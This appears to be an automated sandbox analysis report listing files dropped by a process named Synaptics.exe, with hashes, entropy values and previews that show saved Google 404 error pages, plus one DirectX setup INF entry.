                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.258611716681141
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0rZeSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+we+pAZewRDK4mW
                                                                                              MD5:F9674E2B477866D2566F5295964E5CE4
                                                                                              SHA1:5CBE5AE689127C95742ACC43167851C7A330469B
                                                                                              SHA-256:371EB6490FB7C89F40BCAEE553D000ABAD2B637929FBDE186F9535E93EFB2634
                                                                                              SHA-512:03B060BF78567BCDFF47078571E7D9DC5C5514C9652636C2340E065CD50090033A12B8C0A50F8485E7A2408787F65B3095020583802862E205BF9F5081FEBBCD
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-CnbJhhLxOeBqHcn6wMSgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\8uHCHLQ.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.266621375602147
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0eMSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                              MD5:207C54F4FB0D18D42EEB7869CDE8E545
                                                                                              SHA1:7D0E44416121AE329AC3AF794D839C1C0A22604E
                                                                                              SHA-256:BF678721ED3F58E38BD66B3CF00E4C272B8BF7A7FA376804EC46DC42F0D751F1
                                                                                              SHA-512:1C3A67DCAFAA63AE7512FD52E76F10FCE20DFF1E740953FD4B8EEFCFB533ADC03B40B3C4D1323A52CBA17F22E6F5B8B8552F152F3CEA8D51D402C748468C9CB1
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rtXPDPEBCsOGoj1tRGlNyw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\9GxsAFm.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.255727354439481
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+06SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                              MD5:1B7C9E9ADB583202002AD9BA4731A163
                                                                                              SHA1:9A51FDA811BCBD3088B8CB5BBB29A213F8F656DF
                                                                                              SHA-256:97C5C65E4601FF3470B7B7AB5F24CF341E6538D68231FD9EBB85C0A3D2C0492F
                                                                                              SHA-512:29262EA0160990A9A2CB0F96A2B36186538B4C0A9916870A6EC3E8B3CB76227DB0EDFA76C3D06528AFAB888EA7DCDDC5D01FD4FABE560AE05357ADE98345C980
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ml03r-tq0yD3D-oQiUJmLQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\9P7WTBE.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.276582692968108
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                              MD5:8D1B79B6009234EEDDE5D3FCC844E0F1
                                                                                              SHA1:BD2A9D020A30ACF0BFEE2C3889700E0148A21119
                                                                                              SHA-256:9A8C4868214021CE3518E354F66D8865BAF593A084E320D1CFD38CAC82C005B1
                                                                                              SHA-512:FAD8EE16D7A89D7C5848E7601E77DD86A0F1CC719C16038E47F5026A9ABB840D2F15F244F894C625CBA9EF66F4522B2B36095448B6FD706470D366F1D1D23A9E
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="z2QJPfqP4YO4oLdKC2jMAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\ABeAe1g.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.256878894233277
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0kdLMSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tdLM+pAZewRDK4mW
                                                                                              MD5:6011815D10825C5D3EC9B60325E4DDC8
                                                                                              SHA1:22D3C3222E28120C815312B3A1C35D807FB10961
                                                                                              SHA-256:E88FFD5B284B4E454789A73D8AF0DDBBFFA9386F6291329BB68160756DA8DB53
                                                                                              SHA-512:4CB370AA720A164416EED8CF71E9361D6D5A229FCA7009E911DA62DEA08482BF90C98B713928F1B99899FEB9C146AC80B539655B914C2E9D601C476BB980B1D5
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VWI7hndaieGKfWVFMK2smg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\AEPOrqw.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.265783208285125
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                              MD5:A2698C5239F095DC0F790926F2D0DA1F
                                                                                              SHA1:42C76E4A57C71961A10214448BA2764C598061FA
                                                                                              SHA-256:660B4DF374BFCA7150D4D8F28B6BD7DFB13AEB1DCF31C4E3AE3BF3B56ACC9AFB
                                                                                              SHA-512:B838F61039F973CE380543C0AB41756C78846EB2DD8779839553794460EE62208AB4543E016F827D4F48CCD7B1CC697FC5B7CB93DC12BE1D47405E34238BC827
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DGoLEwXNfIObwsXiBWq03g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\ApRuHhO.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.272463555899183
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+03XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+OX+pAZewRDK4mW
                                                                                              MD5:5349096F50ADD30EE01D9FE71E4F5E06
                                                                                              SHA1:57BDEF063B6F4C23B0CFABFA50EE67120A3AF58C
                                                                                              SHA-256:F26B52624D0CB4BA77ED4D4D3E453C9282B0CDA5913DA54A8357E8A745348B85
                                                                                              SHA-512:8A9E127D5AA3AABBC96CFA7546291F7F4017873F0DF4338F0D19B7BF6A106427DA07F7E5FBE1E475EAFC491E61CD0DA4F56EDC2AC2B62513CB6D13EE880B4BCA
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8wwN_W81JLVNSyCI-vbzyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\BLf8YtB.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.268219974902907
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                              MD5:AAAAAF319B827EC3929413200A610E32
                                                                                              SHA1:A1FC9461D554A35E4B9110B792EA7B4C78667530
                                                                                              SHA-256:1BFBE21811387411C3A46AAA8616597BCE1D277CC15EF64DBCF30EC209605BAC
                                                                                              SHA-512:448738DAD8B62B54AAB2B21BEBBBAF0BD6991B9ECDA440123FF0FF681A7FEE4573E915B06FD79C4FE952C0FEBC24B255130DBD8D74869023A1C7CD4276C08F27
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JWHsBX0riJFfqN8pjfQArg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\BljTqdk.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.273916430199015
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                              MD5:9BC1868F48A3DF9D3406587467909ABF
                                                                                              SHA1:FE19C25F6589CB09373639CF5DAA47122E1DA237
                                                                                              SHA-256:A87F8B06F897F881B82B5685CCB756F836AFFD597BD91CEA798496CD40EBFA0B
                                                                                              SHA-512:EDF0CE1451AAA0FC30F310217BFF516B876417D9BE740C83AA06EFDF0C6A69AA1E74059F253D8E31848408BFD28056FD23C6256E4162978875B17BC663D54858
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VMjwWb-_X8cIPQqL-kqf1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\CSvMBJ5.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.256081144364772
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0lSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+q+pAZewRDK4mW
                                                                                              MD5:0FC5E73DA6840B2395359706A8D30FBD
                                                                                              SHA1:1286DDC0382CA8FA3B8B4940A6B144FC48008815
                                                                                              SHA-256:6DAC9A55D392FC66EB71B6551B47D2A28EA011AEC1C237254FB8F8F44955037A
                                                                                              SHA-512:89FEC48CC0235B1BDC8BCA5160ABD986056953C2585CCDB857F215176D0F98C9E89C8402EED079F66B958C11839405EDB2D9B5A4BF7CD9B520B4BD687536CC0F
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Qo2_576yHDmekrbcJLt6Og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\EFgFIXS.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.272232668245784
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0Da3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n3+pAZewRDK4mW
                                                                                              MD5:9579839AE39CCA359EF1AFFE44F1CF8D
                                                                                              SHA1:8577FCEF73EFE5235A2AFC517BF32B637953C89E
                                                                                              SHA-256:E309221B5D97AED373B6852AF974171B67EC402545F62E1B4DB997E06B6F3346
                                                                                              SHA-512:95C2605A4AAAA6FBAA689ECAF392B1D0CC3212E3AE52E5EB168E5E45931439D1275CFD58E2A864EA7708890B0A554920137BC4D39269A7CD689C01EC7816887C
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QtWRhG8J6yA638GnhBB7Fg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\EqmnxQp.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.2725494298061095
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0LKQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+q+pAZewRDK4mW
                                                                                              MD5:B4CBDF841C55BFB9770E65CCEAA97794
                                                                                              SHA1:92CD56021183F62651E29EF5A0C30C344D6DBF7F
                                                                                              SHA-256:155665AB914D970EE2E7B294291D71AAF85A77C0CBD8B8BF6AB0DC5BFFCEAB86
                                                                                              SHA-512:4B48C7243EE3C10DB919AFDEF864109B5E026BFD0D5D200F601E10298CA64AE576566C4C300BA2C6D6F6D8CACBFD519D3012DE6F003DF36A9B85D053F2A34400
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vZCBDzwtyQBb71sU_XcA6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\FIYhIcW.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.2673323161028
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                              MD5:5A3F1BAC5F1CFCC2C33FC8B6E8A3341F
                                                                                              SHA1:F6D4A1F275E474C17C7317053C03FD1E872D1FE8
                                                                                              SHA-256:00513A7221FF431D434634A66ADFF329E851CED84E7EB795667F722087EAA619
                                                                                              SHA-512:F41A832C25E5B98D653DA0F07CC23909A1FE69955B6589F0758AC0B77269257DE1FADA7E3183A435416DB55028A5DC13D8DF337B8DBF981B391B614072C35ECA
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cskiTSo1RVA3PcCWS8jbrQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\HKWSuR5.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.249235233034252
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0OGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                              MD5:22ADBBED36EA173052E8CDF93E40CA56
                                                                                              SHA1:7ABA6485E24D2B5C2A37410CE72291CC6780AEFA
                                                                                              SHA-256:481CB67DE3CA598CD4C28CE970E6918420EF07496562DD6B41520760AD3A98FD
                                                                                              SHA-512:778B89425FDD1F67F00CAE6F903769B7098C4DFB820B89BF35CABCB0AB1D9B3A892C7848072BBD548D6B2508E909102536F0097CD07F126292AA807F0EC1DF42
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RXcVfpkBll4svVixa3yoIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\DXIBE08.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):57739
                                                                                              Entropy (8bit):5.688682745352895
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:eNITdgil00BU0twUZB7otN4PTH+y491I7/su6U3mI9rITogZD0+pYnrIvdgsl0KW:eEBDSYj4kiJOnitAmfdwe5q24jIxwzKI
                                                                                              MD5:0DAFB23D5BD4B80C79A0F82DC2DE34D0
                                                                                              SHA1:8159FD03F133C9CD8CFB194971A5250B9ECDA0A8
                                                                                              SHA-256:3EF4C33102886EAE3C812B948FF3FBF70BB03DD91E772B852DA3F9AAF75BDB29
                                                                                              SHA-512:78E7FB35CAB3D0ACE4E4FEF2868CC5F31B2254C267402779893B3F3FCE90B8D784328AC19EF0D6BD37D975D557917BE19D7A8A32A94FF8606AFD36883EC1C9BB
                                                                                              Malicious:false
